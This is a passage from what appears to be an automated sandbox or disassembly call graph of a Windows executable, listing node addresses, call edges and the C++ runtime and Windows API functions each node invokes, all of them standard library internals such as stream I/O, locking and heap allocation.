201ea0 20749->20786 20752 204364 20751->20752 20753 20444e 20751->20753 20755 2043a5 20752->20755 20756 20437e 20752->20756 20760 204393 codecvt 20752->20760 20754 202610 std::_Throw_Cpp_error 30 API calls 20753->20754 20754->20760 20758 20a663 std::ios_base::_Init 3 API calls 20755->20758 20756->20753 20757 20438a 20756->20757 20761 20a663 std::ios_base::_Init 3 API calls 20757->20761 20758->20760 20759 217ddf std::_Throw_Cpp_error 29 API calls 20762 204458 20759->20762 20760->20759 20763 204424 _Deallocate 20760->20763 20761->20760 20763->20742 20765 201788 _strlen 20764->20765 20768 201833 20765->20768 20769 20180d 20765->20769 20817 202c50 20765->20817 20768->20769 20791 204460 20768->20791 20771 201b8e 20769->20771 20774 21060c Concurrency::cancel_current_task RaiseException 20769->20774 20835 202f00 20769->20835 20843 2032c0 20769->20843 20772 201b9f 20771->20772 20827 2038e0 20771->20827 20772->20742 20774->20769 20776 20188d 20776->20769 20808 20def0 20776->20808 20779 201d5c 20778->20779 20780 204460 67 API calls 20779->20780 20781 201d70 20780->20781 21200 204b10 20781->21200 20784 202c50 39 API calls 20785 201deb 20784->20785 20785->20742 20787 201ea9 20786->20787 20788 201ec2 _Deallocate 20786->20788 20787->20788 20789 217ddf std::_Throw_Cpp_error 29 API calls 20787->20789 20790 201eec 20789->20790 20860 20a9f4 20791->20860 20794 20a9f4 std::_Lockit::_Lockit 7 API calls 20796 2044b7 20794->20796 20795 204556 20797 20aa25 std::_Lockit::~_Lockit 2 API calls 20795->20797 20866 20aa25 20796->20866 20800 204585 20797->20800 20800->20776 20802 2044d8 20802->20795 20873 2045f0 20802->20873 20803 204543 20885 20ab43 20803->20885 20804 204598 20890 203e50 20804->20890 20812 20df1e 20808->20812 20816 20df17 20808->20816 20809 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20810 20e01c 20809->20810 20810->20776 20813 20dfd0 20812->20813 20814 20df69 20812->20814 20812->20816 20813->20816 21091 21932d 20813->21091 20814->20816 21088 20dada 20814->21088 20816->20809 20819 202c90 20817->20819 20821 202d5a 20817->20821 20818 202cb3 20818->20821 20822 2038e0 39 API calls 20818->20822 20819->20818 20820 202c50 39 API calls 20819->20820 20824 202cd7 20819->20824 20820->20824 20821->20768 20822->20821 20823 202f00 std::ios_base::_Init 38 API calls 20823->20824 20824->20818 20824->20823 20825 2032c0 std::ios_base::_Init 30 API calls 20824->20825 20826 21060c Concurrency::cancel_current_task RaiseException 20824->20826 20825->20824 20826->20824 20828 203962 20827->20828 20829 203919 20827->20829 20828->20772 20829->20828 20830 202f00 std::ios_base::_Init 38 API calls 20829->20830 20831 203998 20830->20831 20832 2032c0 std::ios_base::_Init 30 API calls 20831->20832 20833 2039aa 20832->20833 20834 21060c Concurrency::cancel_current_task RaiseException 20833->20834 20834->20828 20836 202f34 20835->20836 20842 202f28 20835->20842 21170 20a6ef AcquireSRWLockExclusive 20836->21170 20838 202f40 20838->20842 21175 20a7a4 20838->21175 20842->20769 20844 203307 _strlen 20843->20844 20845 203312 20844->20845 20846 2033ff 20844->20846 20848 203352 20845->20848 20849 203369 20845->20849 20854 20331c codecvt 20845->20854 20847 202600 std::_Throw_Cpp_error 30 API calls 20846->20847 20858 2033ad 20847->20858 20852 20a663 std::ios_base::_Init 3 API calls 20848->20852 20850 20a663 std::ios_base::_Init 3 API calls 20849->20850 20850->20854 20851 217ddf std::_Throw_Cpp_error 29 API calls 20853 203409 20851->20853 20852->20854 20855 201460 std::_Throw_Cpp_error 29 API calls 20853->20855 20856 203430 std::_Throw_Cpp_error 30 API calls 20854->20856 20857 20341f 20855->20857 20856->20858 20857->20769 20858->20851 20859 2033d3 _Deallocate 20858->20859 20859->20769 20861 20aa03 20860->20861 20862 20aa0a 20860->20862 20893 21810f 20861->20893 20863 20449a 20862->20863 20898 20fac8 EnterCriticalSection 20862->20898 20863->20794 20863->20802 20867 21811d 20866->20867 20868 20aa2f 20866->20868 20951 2180f8 LeaveCriticalSection 20867->20951 20869 20aa42 20868->20869 20950 20fad6 LeaveCriticalSection 20868->20950 20869->20802 20872 218124 20872->20802 20874 204628 20873->20874 20875 20453b 20873->20875 20874->20875 20876 20a663 std::ios_base::_Init 3 API calls 20874->20876 20875->20803 20875->20804 20877 20463b 20876->20877 20952 203e90 20877->20952 20886 20ab4e _Yarn 20885->20886 20887 20ab55 20886->20887 21084 20b4b2 20886->21084 20887->20795 20891 21060c Concurrency::cancel_current_task RaiseException 20890->20891 20892 203e82 20891->20892 20899 21ced4 20893->20899 20898->20863 20920 21d05b 20899->20920 20921 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20920->20921 20922 21ced9 20921->20922 20923 21d075 20922->20923 20924 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20923->20924 20925 21cede 20924->20925 20926 21d08f 20925->20926 20927 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20926->20927 20928 21cee3 20927->20928 20929 21d0a9 20928->20929 20930 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20929->20930 20931 21cee8 20930->20931 20932 21d0c3 20931->20932 20933 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20932->20933 20934 21ceed 20933->20934 20935 21d0dd 20934->20935 20936 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20935->20936 20937 21cef2 20936->20937 20938 21d0f7 20937->20938 20939 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20938->20939 20940 21cef7 20939->20940 20941 21d111 20940->20941 20950->20869 20951->20872 20953 20a9f4 std::_Lockit::_Lockit 7 API calls 20952->20953 20954 203ecb 20953->20954 20955 203f18 20954->20955 20956 203f3f 20954->20956 21014 20abc5 20955->21014 21023 20b4ef 20956->21023 20975 20ecbf 21037 213114 20975->21037 21028 21974f 21014->21028 21018 20abea 21019 20abf9 21018->21019 21020 21974f std::_Locinfo::_Locinfo_dtor 64 API calls 21018->21020 21021 20ac2b _Yarn 14 API calls 21019->21021 21020->21019 21022 203f26 21021->21022 21022->20975 21024 207900 codecvt 29 API calls 21023->21024 21025 20b500 21024->21025 21026 21060c Concurrency::cancel_current_task RaiseException 21025->21026 21027 20b50e 21026->21027 21029 21ced4 std::_Locinfo::_Locinfo_dtor 5 API calls 21028->21029 21030 21975c 21029->21030 21031 219981 std::_Locinfo::_Locinfo_dtor 64 API calls 21030->21031 21032 20abd2 21031->21032 21033 20ac2b 21032->21033 21034 20ac39 21033->21034 21036 20ac45 _Yarn codecvt 21033->21036 21035 2192d7 ___std_exception_destroy 14 API calls 21034->21035 21034->21036 21035->21036 21036->21018 21085 20b4c0 Concurrency::cancel_current_task 21084->21085 21086 21060c Concurrency::cancel_current_task RaiseException 21085->21086 21087 20b4ce 21086->21087 21095 218d91 21088->21095 21090 20dae8 21090->20816 21092 219340 _Fputc 21091->21092 21143 21950e 21092->21143 21094 219355 _Fputc 21094->20816 21096 218da4 _Fputc 21095->21096 21099 218f33 21096->21099 21098 218db3 _Fputc 21098->21090 21100 218f3f ___scrt_is_nonwritable_in_current_image 21099->21100 21101 218f46 21100->21101 21102 218f6b 21100->21102 21103 217f78 __strnicoll 29 API calls 21101->21103 21110 213315 EnterCriticalSection 21102->21110 21109 218f61 21103->21109 21105 218f7a 21111 218dc7 21105->21111 21109->21098 21110->21105 21112 218dec 21111->21112 21113 218dfe 21111->21113 21114 218eff _Fputc 66 API calls 21112->21114 21115 21f704 _Ungetc 29 API calls 21113->21115 21127 218df6 21114->21127 21116 218e05 21115->21116 21118 21f704 _Ungetc 29 API calls 21116->21118 21122 218e2d 21116->21122 21117 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21119 218efd 21117->21119 21121 218e16 21118->21121 21140 218fbb 21119->21140 21120 218ee3 21124 218eff _Fputc 66 API calls 21120->21124 21121->21122 21125 21f704 _Ungetc 29 API calls 21121->21125 21122->21120 21123 21f704 _Ungetc 29 API calls 21122->21123 21126 218e60 21123->21126 21124->21127 21127->21117 21144 219544 21143->21144 21145 21951c 21143->21145 21144->21094 21145->21144 21146 219529 21145->21146 21147 21954b 21145->21147 21149 217f78 __strnicoll 29 API calls 21146->21149 21151 2195d1 21147->21151 21149->21144 21152 2195dd ___scrt_is_nonwritable_in_current_image 21151->21152 21159 213315 EnterCriticalSection 21152->21159 21154 2195eb 21160 219585 21154->21160 21159->21154 21161 21e68b 30 API calls 21160->21161 21162 21959d 21161->21162 21163 219367 66 API calls 21162->21163 21164 2195bb 21163->21164 21165 21e774 64 API calls 21164->21165 21171 20a703 21170->21171 21172 20a708 ReleaseSRWLockExclusive 21171->21172 21179 20a78f SleepConditionVariableSRW 21171->21179 21172->20838 21180 20a7b9 21175->21180 21178 20a73e AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 21178->20842 21179->21171 21181 20a7c8 21180->21181 21182 20a7cf 21180->21182 21186 21743c 21181->21186 21189 2173cb 21182->21189 21185 202f58 21185->21178 21187 2173cb std::ios_base::_Init 32 API calls 21186->21187 21188 21744e 21187->21188 21188->21185 21192 21762e 21189->21192 21193 21763a ___scrt_is_nonwritable_in_current_image 21192->21193 21194 2180e1 std::_Lockit::_Lockit EnterCriticalSection 21193->21194 21195 217648 21194->21195 21196 217452 std::ios_base::_Init 32 API calls 21195->21196 21197 217655 21196->21197 21198 21767d std::ios_base::_Init LeaveCriticalSection 21197->21198 21199 2173fc 21198->21199 21199->21185 21201 204b4f 21200->21201 21203 202c50 39 API calls 21201->21203 21204 204b6f 21201->21204 21202 202f00 std::ios_base::_Init 38 API calls 21202->21204 21203->21204 21204->21202 21205 2032c0 std::ios_base::_Init 30 API calls 21204->21205 21207 204c3e 21204->21207 21209 21060c Concurrency::cancel_current_task RaiseException 21204->21209 21205->21204 21206 201de4 21206->20784 21207->21206 21208 2038e0 39 API calls 21207->21208 21208->21206 21209->21204 21211 2027ae 21210->21211 21212 202c50 39 API calls 21211->21212 21215 2027fa 21211->21215 21220 2027d1 21211->21220 21212->21215 21213 202f00 std::ios_base::_Init 38 API calls 21213->21220 21214 2032c0 std::ios_base::_Init 30 API calls 21214->21220 21215->21220 21230 20cfb0 21215->21230 21216 201028 21222 201110 21216->21222 21217 2029de 21217->21216 21218 2038e0 39 API calls 21217->21218 21218->21216 21219 21060c Concurrency::cancel_current_task RaiseException 21219->21220 21220->21213 21220->21214 21220->21217 21220->21219 21223 20115c 21222->21223 21234 203c70 21223->21234 21228 202c50 39 API calls 21229 201031 21228->21229 21229->20295 21231 20cfbf 21230->21231 21232 20cfd2 codecvt 21230->21232 21231->21220 21232->21231 21233 21932d 69 API calls 21232->21233 21233->21231 21235 20a9f4 std::_Lockit::_Lockit 7 API calls 21234->21235 21236 203caa 21235->21236 21237 20a9f4 std::_Lockit::_Lockit 7 API calls 21236->21237 21239 203ce5 21236->21239 21238 203cc4 21237->21238 21243 20aa25 std::_Lockit::~_Lockit 2 API calls 21238->21243 21241 20a663 std::ios_base::_Init 3 API calls 21239->21241 21252 203daf 21239->21252 21240 20aa25 std::_Lockit::~_Lockit 2 API calls 21242 201170 21240->21242 21244 203d4a 21241->21244 21253 203a00 21242->21253 21243->21239 21245 203e90 codecvt 67 API calls 21244->21245 21246 203d7c 21245->21246 21247 20ecbf __Getctype 39 API calls 21246->21247 21248 203d97 21247->21248 21249 204010 codecvt 65 API calls 21248->21249 21250 203da2 21249->21250 21251 20ab43 RaiseException 21250->21251 21251->21252 21252->21240 21255 203a3f 21253->21255 21254 203a85 21263 203a5f 21254->21263 21267 20cb40 21254->21267 21276 20cb22 21254->21276 21288 20cb32 21254->21288 21255->21254 21258 202c50 39 API calls 21255->21258 21255->21263 21256 202f00 std::ios_base::_Init 38 API calls 21256->21263 21257 203b2d 21260 2011e4 21257->21260 21261 2038e0 39 API calls 21257->21261 21258->21254 21259 2032c0 std::ios_base::_Init 30 API calls 21259->21263 21260->21228 21261->21260 21262 21060c Concurrency::cancel_current_task RaiseException 21262->21263 21263->21256 21263->21257 21263->21259 21263->21262 21270 20cb63 21267->21270 21272 20cb5c 21267->21272 21268 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21269 20cc48 21268->21269 21269->21263 21270->21272 21273 20cc09 21270->21273 21274 20cba9 21270->21274 21272->21268 21273->21272 21275 21932d 69 API calls 21273->21275 21274->21272 21301 20c44d 21274->21301 21275->21272 21277 20cb29 21276->21277 21284 20cb75 21276->21284 21340 213315 EnterCriticalSection 21277->21340 21278 20cb79 21281 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21278->21281 21280 20cb2e 21280->21263 21283 20cc48 21281->21283 21282 20cba9 21282->21278 21285 20c44d _Fputc 68 API calls 21282->21285 21283->21263 21284->21278 21284->21282 21286 20cc09 21284->21286 21285->21278 21286->21278 21287 21932d 69 API calls 21286->21287 21287->21278 21289 20cb39 21288->21289 21293 20cb85 21288->21293 21341 213329 LeaveCriticalSection 21289->21341 21291 20cb10 21291->21263 21292 20cb3e 21292->21263 21293->21291 21294 20cc09 21293->21294 21295 20cbea 21293->21295 21296 21932d 69 API calls 21294->21296 21299 20cbfb 21294->21299 21297 20c44d _Fputc 68 API calls 21295->21297 21295->21299 21296->21299 21297->21299 21298 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21300 20cc48 21298->21300 21299->21298 21300->21263 21304 218bfc 21301->21304 21303 20c45d 21303->21272 21305 218c0f _Fputc 21304->21305 21308 218c5d 21305->21308 21307 218c1e _Fputc 21307->21303 21309 218c69 ___scrt_is_nonwritable_in_current_image 21308->21309 21310 218c72 21309->21310 21311 218c96 21309->21311 21312 217f78 __strnicoll 29 API calls 21310->21312 21324 213315 EnterCriticalSection 21311->21324 21314 218c8b _Fputc 21312->21314 21314->21307 21315 218c9f 21323 218cb4 21315->21323 21330 21f704 21315->21330 21317 218d51 21325 218c30 21317->21325 21318 218d20 21319 217f78 __strnicoll 29 API calls 21318->21319 21319->21314 21321 218d5d 21323->21317 21323->21318 21324->21315 21326 218c4f 21325->21326 21327 218c3e 21325->21327 21326->21321 21328 224a37 _Fputc 66 API calls 21327->21328 21331 21f710 21330->21331 21332 21f725 21330->21332 21333 2176e4 __strnicoll 14 API calls 21331->21333 21332->21323 21334 21f715 21333->21334 21335 217dcf __strnicoll 29 API calls 21334->21335 21340->21280 21341->21292 21342 2015d0 21353 201e40 21342->21353 21344 201702 _Deallocate 21345 204320 30 API calls 21352 2015db 21345->21352 21346 2016dd 21346->21344 21347 217ddf std::_Throw_Cpp_error 29 API calls 21346->21347 21349 201725 21347->21349 21348 201750 103 API calls 21348->21352 21350 201ea0 29 API calls 21349->21350 21351 201d10 75 API calls 21351->21352 21352->21345 21352->21346 21352->21348 21352->21351 21354 201e63 _Fputc 21353->21354 21359 213558 21354->21359 21356 201e7c 21357 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21356->21357 21358 201e8c 21357->21358 21358->21352 21360 21356c _Fputc 21359->21360 21361 21358e 21360->21361 21363 2135b5 21360->21363 21362 217f78 __strnicoll 29 API calls 21361->21362 21365 2135a9 _Fputc 21362->21365 21366 214d0d 21363->21366 21365->21356 21367 214d19 ___scrt_is_nonwritable_in_current_image 21366->21367 21374 213315 EnterCriticalSection 21367->21374 21369 214d27 21375 2146e2 21369->21375 21374->21369 21389 21e68b 21375->21389 21377 214709 21396 213b31 21377->21396 21384 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21385 21477c 21384->21385 21386 214d5c 21385->21386 21892 213329 LeaveCriticalSection 21386->21892 21388 214d45 21388->21365 21419 21e736 21389->21419 21391 21e6fe 21391->21377 21392 21e69c _Fputc 21392->21391 21427 21bf11 21392->21427 21395 21bed7 ___free_lconv_mon 14 API calls 21395->21391 21443 213a93 21396->21443 21399 213b57 21400 217f78 __strnicoll 29 API calls 21399->21400 21402 213b74 21400->21402 21401 213b7f std::_Locinfo::_Locinfo_dtor 21401->21402 21405 213790 _Fputc 39 API calls 21401->21405 21407 2139f2 66 API calls 21401->21407 21408 213d73 21401->21408 21449 213de1 21401->21449 21452 213e59 21401->21452 21492 213fb2 21401->21492 21412 213861 21402->21412 21405->21401 21407->21401 21409 217f78 __strnicoll 29 API calls 21408->21409 21410 213d8d 21409->21410 21411 217f78 __strnicoll 29 API calls 21410->21411 21411->21402 21413 21bed7 ___free_lconv_mon 14 API calls 21412->21413 21414 213871 21413->21414 21415 21e774 21414->21415 21416 21476a 21415->21416 21417 21e77f 21415->21417 21416->21384 21417->21416 21786 2185b8 21417->21786 21421 21e742 _Fputc 21419->21421 21420 21e770 21420->21392 21421->21420 21422 21e76c 21421->21422 21423 21f704 _Ungetc 29 API calls 21421->21423 21422->21392 21424 21e75d 21423->21424 21434 22744f 21424->21434 21426 21e763 21426->21392 21428 21bf4f 21427->21428 21432 21bf1f __dosmaperr 21427->21432 21430 2176e4 __strnicoll 14 API calls 21428->21430 21429 21bf3a RtlAllocateHeap 21431 21bf4d 21429->21431 21429->21432 21430->21431 21431->21395 21432->21428 21432->21429 21433 215877 std::ios_base::_Init 2 API calls 21432->21433 21433->21432 21435 227469 21434->21435 21436 22745c 21434->21436 21438 227475 21435->21438 21439 2176e4 __strnicoll 14 API calls 21435->21439 21437 2176e4 __strnicoll 14 API calls 21436->21437 21440 227461 21437->21440 21438->21426 21441 227496 21439->21441 21440->21426 21442 217dcf __strnicoll 29 API calls 21441->21442 21442->21440 21444 213ac0 21443->21444 21445 213a9e 21443->21445 21527 2135fc 21444->21527 21447 217f78 __strnicoll 29 API calls 21445->21447 21448 213ab9 21447->21448 21448->21399 21448->21401 21448->21402 21535 214dda 21449->21535 21451 213e1c 21451->21401 21453 213e60 21452->21453 21454 213e77 21452->21454 21455 214042 21453->21455 21456 213fd6 21453->21456 21463 213eb6 21453->21463 21457 217f78 __strnicoll 29 API calls 21454->21457 21454->21463 21461 214081 21455->21461 21462 214047 21455->21462 21458 21406a 21456->21458 21459 213fdc 21456->21459 21460 213eab 21457->21460 21583 214b80 21458->21583 21473 213fe1 21459->21473 21474 214037 21459->21474 21460->21401 21464 2140a0 21461->21464 21465 214086 21461->21465 21466 214049 21462->21466 21467 214078 21462->21467 21463->21401 21594 21460c 21464->21594 21465->21458 21465->21474 21486 214009 21465->21486 21471 213ff0 21466->21471 21478 214058 21466->21478 21590 2145ef 21467->21590 21476 2140ab 21471->21476 21558 21445e 21471->21558 21473->21471 21475 21401c 21473->21475 21473->21486 21474->21476 21572 214866 21474->21572 21475->21476 21568 2142f4 21475->21568 21481 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21476->21481 21478->21458 21480 21405c 21478->21480 21480->21476 21579 214622 21480->21579 21483 2142f2 21481->21483 21483->21401 21484 2141ac 21487 213acb 66 API calls 21484->21487 21489 21421f 21484->21489 21486->21476 21486->21484 21597 213acb 21486->21597 21487->21484 21491 214284 21489->21491 21601 21f430 21489->21601 21490 213acb 66 API calls 21490->21491 21491->21476 21491->21490 21493 214042 21492->21493 21494 213fd6 21492->21494 21497 214081 21493->21497 21498 214047 21493->21498 21495 21406a 21494->21495 21496 213fdc 21494->21496 21504 214b80 30 API calls 21495->21504 21508 213fe1 21496->21508 21509 214037 21496->21509 21499 2140a0 21497->21499 21500 214086 21497->21500 21501 214049 21498->21501 21502 214078 21498->21502 21503 21460c 30 API calls 21499->21503 21500->21495 21500->21509 21521 214009 21500->21521 21506 213ff0 21501->21506 21513 214058 21501->21513 21505 2145ef 30 API calls 21502->21505 21503->21521 21504->21521 21505->21521 21507 21445e 42 API calls 21506->21507 21511 2140ab 21506->21511 21507->21521 21508->21506 21510 21401c 21508->21510 21508->21521 21509->21511 21512 214866 30 API calls 21509->21512 21510->21511 21514 2142f4 41 API calls 21510->21514 21516 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21511->21516 21512->21521 21513->21495 21515 21405c 21513->21515 21514->21521 21515->21511 21517 214622 29 API calls 21515->21517 21518 2142f2 21516->21518 21517->21521 21518->21401 21519 213acb 66 API calls 21519->21521 21520 2141ac 21523 21421f 21520->21523 21524 213acb 66 API calls 21520->21524 21521->21511 21521->21519 21521->21520 21522 214284 21522->21511 21526 213acb 66 API calls 21522->21526 21523->21522 21525 21f430 _Fputc 41 API calls 21523->21525 21524->21520 21525->21523 21526->21522 21528 213610 21527->21528 21529 21367a 21527->21529 21530 21f704 _Ungetc 29 API calls 21528->21530 21529->21448 21531 213617 21530->21531 21531->21529 21532 2176e4 __strnicoll 14 API calls 21531->21532 21533 21366f 21532->21533 21534 217dcf __strnicoll 29 API calls 21533->21534 21534->21529 21545 214d68 21535->21545 21537 214dec 21538 214e01 21537->21538 21540 214e34 21537->21540 21544 214e1c std::_Locinfo::_Locinfo_dtor 21537->21544 21539 217f78 __strnicoll 29 API calls 21538->21539 21539->21544 21541 214ecb 21540->21541 21552 214db1 21540->21552 21542 214db1 29 API calls 21541->21542 21542->21544 21544->21451 21546 214d80 21545->21546 21547 214d6d 21545->21547 21546->21537 21548 2176e4 __strnicoll 14 API calls 21547->21548 21549 214d72 21548->21549 21550 217dcf __strnicoll 29 API calls 21549->21550 21551 214d7d 21550->21551 21551->21537 21553 214dc2 21552->21553 21554 214dd6 21552->21554 21553->21554 21555 2176e4 __strnicoll 14 API calls 21553->21555 21554->21541 21556 214dcb 21555->21556 21557 217dcf __strnicoll 29 API calls 21556->21557 21557->21554 21559 214478 21558->21559 21611 21477e 21559->21611 21561 2144b7 21622 21e8ff 21561->21622 21564 213790 _Fputc 39 API calls 21565 21456e 21564->21565 21566 213790 _Fputc 39 API calls 21565->21566 21567 2145a1 21565->21567 21566->21567 21567->21486 21567->21567 21569 21430f 21568->21569 21570 214345 21569->21570 21571 21f430 _Fputc 41 API calls 21569->21571 21570->21486 21571->21570 21573 21487b 21572->21573 21574 2148c4 21573->21574 21575 21489d 21573->21575 21577 2148ba 21574->21577 21578 21477e 15 API calls 21574->21578 21576 217f78 __strnicoll 29 API calls 21575->21576 21576->21577 21577->21486 21578->21577 21581 214638 21579->21581 21580 217f78 __strnicoll 29 API calls 21582 214659 21580->21582 21581->21580 21581->21582 21582->21486 21584 214b95 21583->21584 21585 214bb7 21584->21585 21587 214bde 21584->21587 21586 217f78 __strnicoll 29 API calls 21585->21586 21589 214bd4 21586->21589 21588 21477e 15 API calls 21587->21588 21587->21589 21588->21589 21589->21486 21591 2145fb 21590->21591 21779 2149f3 21591->21779 21593 21460b 21593->21486 21595 214866 30 API calls 21594->21595 21596 214621 21595->21596 21596->21486 21598 213add 21597->21598 21599 213ae5 21598->21599 21600 218c30 _Fputc 66 API calls 21598->21600 21599->21486 21600->21599 21602 21f445 21601->21602 21603 21f486 21602->21603 21605 213790 _Fputc 39 API calls 21602->21605 21609 21f449 __fread_nolock _Fputc 21602->21609 21610 21f472 __fread_nolock 21602->21610 21606 21c021 _Fputc WideCharToMultiByte 21603->21606 21603->21609 21603->21610 21604 217f78 __strnicoll 29 API calls 21604->21609 21605->21603 21607 21f541 21606->21607 21608 21f557 GetLastError 21607->21608 21607->21609 21608->21609 21608->21610 21609->21489 21610->21604 21610->21609 21612 2147a5 21611->21612 21621 214793 21611->21621 21613 21bf11 __fread_nolock 15 API calls 21612->21613 21612->21621 21614 2147c9 21613->21614 21615 2147d1 21614->21615 21616 2147dc 21614->21616 21617 21bed7 ___free_lconv_mon 14 API calls 21615->21617 21641 21383d 21616->21641 21617->21621 21620 21bed7 ___free_lconv_mon 14 API calls 21620->21621 21621->21561 21623 21e934 21622->21623 21625 21e910 21622->21625 21623->21625 21627 21e967 21623->21627 21624 217f78 __strnicoll 29 API calls 21626 21454a 21624->21626 21625->21624 21626->21564 21626->21565 21628 21e9a0 21627->21628 21630 21e9cf 21627->21630 21644 21eab4 21628->21644 21629 21e9f8 21634 21ea25 21629->21634 21635 21ea5f 21629->21635 21630->21629 21631 21e9fd 21630->21631 21652 21ee76 21631->21652 21637 21ea45 21634->21637 21638 21ea2a 21634->21638 21679 21ec9c 21635->21679 21672 21f291 21637->21672 21662 21f327 21638->21662 21642 21bed7 ___free_lconv_mon 14 API calls 21641->21642 21643 21384c 21642->21643 21643->21620 21645 21eaca 21644->21645 21646 21ead5 21644->21646 21645->21626 21686 21bb4c 21646->21686 21649 21eb3a 21649->21626 21650 217dfc __Getctype 11 API calls 21651 21eb48 21650->21651 21653 21ee89 21652->21653 21654 21ee98 21653->21654 21655 21eeba 21653->21655 21657 217f78 __strnicoll 29 API calls 21654->21657 21656 21eecf 21655->21656 21659 21ef22 21655->21659 21658 21ec9c 41 API calls 21656->21658 21661 21eeb0 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strrchr __allrem 21657->21661 21658->21661 21660 213790 _Fputc 39 API calls 21659->21660 21659->21661 21660->21661 21661->21626 21695 227792 21662->21695 21673 227792 31 API calls 21672->21673 21674 21f2c0 21673->21674 21675 2275e7 29 API calls 21674->21675 21676 21f301 21675->21676 21677 21f308 21676->21677 21678 21f1a3 39 API calls 21676->21678 21677->21626 21678->21677 21680 227792 31 API calls 21679->21680 21681 21ecc6 21680->21681 21682 2275e7 29 API calls 21681->21682 21683 21ed14 21682->21683 21684 21ed1b 21683->21684 21685 21eb49 41 API calls 21683->21685 21684->21626 21685->21684 21687 21bb68 21686->21687 21688 21bb5a 21686->21688 21689 2176e4 __strnicoll 14 API calls 21687->21689 21688->21687 21693 21bb80 21688->21693 21690 21bb70 21689->21690 21692 217dcf __strnicoll 29 API calls 21690->21692 21691 21bb7a 21691->21649 21691->21650 21692->21691 21693->21691 21694 2176e4 __strnicoll 14 API calls 21693->21694 21694->21690 21696 2277c6 21695->21696 21697 217343 29 API calls 21696->21697 21699 22782f 21697->21699 21698 22785b 21700 21bb4c ___std_exception_copy 29 API calls 21698->21700 21699->21698 21701 2278ed 21699->21701 21704 2278c8 21699->21704 21705 227888 21699->21705 21702 2278b8 21700->21702 21703 217343 29 API calls 21701->21703 21706 228d6d 21702->21706 21713 2278c3 21702->21713 21708 227917 21703->21708 21707 21bb4c ___std_exception_copy 29 API calls 21704->21707 21705->21698 21705->21701 21709 217dfc __Getctype 11 API calls 21706->21709 21707->21702 21710 217343 29 API calls 21708->21710 21711 228d79 21709->21711 21712 22792a 21710->21712 21716 22a4c0 21 API calls 21712->21716 21714 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21713->21714 21715 21f357 21714->21715 21751 2275e7 21715->21751 21717 2279a4 21716->21717 21718 22a660 __floor_pentium4 21 API calls 21717->21718 21719 2279ae 21718->21719 21752 2275f8 21751->21752 21754 22761a 21751->21754 21753 217f78 __strnicoll 29 API calls 21752->21753 21756 227610 codecvt 21753->21756 21755 217f78 __strnicoll 29 API calls 21754->21755 21754->21756 21755->21756 21780 214a08 21779->21780 21781 214a2a 21780->21781 21783 214a51 21780->21783 21782 217f78 __strnicoll 29 API calls 21781->21782 21785 214a47 21782->21785 21784 21477e 15 API calls 21783->21784 21783->21785 21784->21785 21785->21593 21787 2185d1 21786->21787 21788 2185f8 21786->21788 21787->21788 21789 21f704 _Ungetc 29 API calls 21787->21789 21788->21416 21790 2185ed 21789->21790 21792 223e10 21790->21792 21793 223e1c ___scrt_is_nonwritable_in_current_image 21792->21793 21794 223e5d 21793->21794 21796 223ea3 21793->21796 21802 223e24 21793->21802 21795 217f78 __strnicoll 29 API calls 21794->21795 21795->21802 21803 223868 EnterCriticalSection 21796->21803 21798 223ea9 21799 223ec7 21798->21799 21804 223bf4 21798->21804 21832 223f19 21799->21832 21802->21788 21803->21798 21805 223c1c 21804->21805 21831 223c3f __fread_nolock 21804->21831 21806 223c20 21805->21806 21808 223c7b 21805->21808 21807 217f78 __strnicoll 29 API calls 21806->21807 21807->21831 21809 223c99 21808->21809 21849 2229a2 21808->21849 21835 223f21 21809->21835 21813 223cb1 21817 223ce0 21813->21817 21818 223cb9 21813->21818 21814 223cf8 21815 223d61 WriteFile 21814->21815 21816 223d0c 21814->21816 21819 223d83 GetLastError 21815->21819 21830 223cf3 21815->21830 21821 223d14 21816->21821 21822 223d4d 21816->21822 21857 223f9e GetConsoleOutputCP 21817->21857 21818->21831 21852 224365 21818->21852 21819->21830 21825 223d39 21821->21825 21826 223d19 21821->21826 21842 2243cd 21822->21842 21877 224591 21825->21877 21827 223d22 21826->21827 21826->21831 21870 2244a8 21827->21870 21830->21831 21831->21799 21891 22388b LeaveCriticalSection 21832->21891 21834 223f1f 21834->21802 21836 22744f __fread_nolock 29 API calls 21835->21836 21838 223f33 21836->21838 21837 223cab 21837->21813 21837->21814 21838->21837 21839 213790 _Fputc 39 API calls 21838->21839 21841 223f61 21838->21841 21839->21841 21840 223f7b GetConsoleMode 21840->21837 21841->21837 21841->21840 21847 2243dc _Fputc 21842->21847 21843 22448d 21844 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21843->21844 21845 2244a6 21844->21845 21845->21831 21846 22444c WriteFile 21846->21847 21848 22448f GetLastError 21846->21848 21847->21843 21847->21846 21848->21843 21885 222b03 21849->21885 21851 2229bb 21851->21809 21853 2243bc 21852->21853 21856 224387 21852->21856 21853->21831 21854 22a2d1 5 API calls _Fputc 21854->21856 21855 2243be GetLastError 21855->21853 21856->21853 21856->21854 21856->21855 21858 224010 21857->21858 21864 224017 codecvt 21857->21864 21859 213790 _Fputc 39 API calls 21858->21859 21859->21864 21860 2242cd 21861 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 